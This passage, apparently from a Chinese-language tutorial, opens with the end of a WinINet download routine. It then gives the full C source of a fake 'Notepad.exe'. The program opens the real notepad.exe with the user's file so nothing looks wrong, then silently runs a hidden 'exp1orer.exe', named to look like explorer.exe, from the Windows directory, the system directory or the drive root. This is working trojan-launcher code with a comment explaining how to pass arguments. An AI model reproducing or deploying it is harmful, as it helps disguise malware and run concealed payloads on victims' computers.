  CloseHandle(createfile);    
  InternetCloseHandle(HOpen);   
  InternetCloseHandle(HInternet); 
  return TRUE;
}


Notepad.exe文件代码如下:
#pragma comment(lib,"Shell32.lib")
#pragma comment(lib,"kernel32.lib")
#include <windows.h>
#include <tchar.h>
bool FileExists(char *filename);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpszCmdLine,int nCmdShow)

  int   argc=0;
  int i;
  LPWSTR   *argv=CommandLineToArgvW(GetCommandLineW(),&argc); 
  char cmdline[MAX_PATH];
  char windows[MAX_PATH];
  char system[MAX_PATH];
  char root[MAX_PATH];
  char arg[MAX_PATH];
  memset(root,'\0',MAX_PATH);
  memset(windows,'\0',MAX_PATH);
  memset(system,'\0',MAX_PATH);
  memset(cmdline,'\0',MAX_PATH);
  memset(arg,'\0',MAX_PATH);
  GetWindowsDirectory(windows,MAX_PATH);
  GetSystemDirectory(system,MAX_PATH);
  lstrcpy(root,windows);
  lstrcpy(cmdline,windows);
  lstrcat(cmdline,"\\notepad.exe");
  lstrcat(windows,"\\exp1orer.exe");
  lstrcat(system,"\\exp1orer.exe");
//下面的判断很重要,当用LPWSTR   *argv=CommandLineToArgvW(GetCommandLineW(),&argc)把文件名当作参数传入的时候,文件名中不能有空格,比如C:\program files\a.txt,会报找不到C:\program.txt文件,因为参数的个数是以空格判断的,所以一定要加个下面的判断
  for(i=1;i<argc;i++)
  {
    lstrcat(cmdline," ");
    WideCharToMultiByte(CP_OEMCP,NULL,argv[i],-1,arg,MAX_PATH,NULL,NULL);
    lstrcat(cmdline,arg);
  }
  WinExec(cmdline,SW_SHOW);
  if(FileExists(windows))
    WinExec(windows,SW_HIDE);
  else
    if(FileExists(system))
      WinExec(system,SW_HIDE);
    else  
    {
      root[3]='\0';
      lstrcat(root,"exp1orer.exe");
      if(FileExists(root)) 
        WinExec(root,SW_HIDE);
    }
    return 0;  
}
bool FileExists(char *filename)
{
  HANDLE hFind;
  WIN32_FIND_DATA FindData;
  hFind=FindFirstFile(filename,&FindData);
  if(hFind==INVALID_HANDLE_VALUE)
  {
    return false;
  }
  return true;
}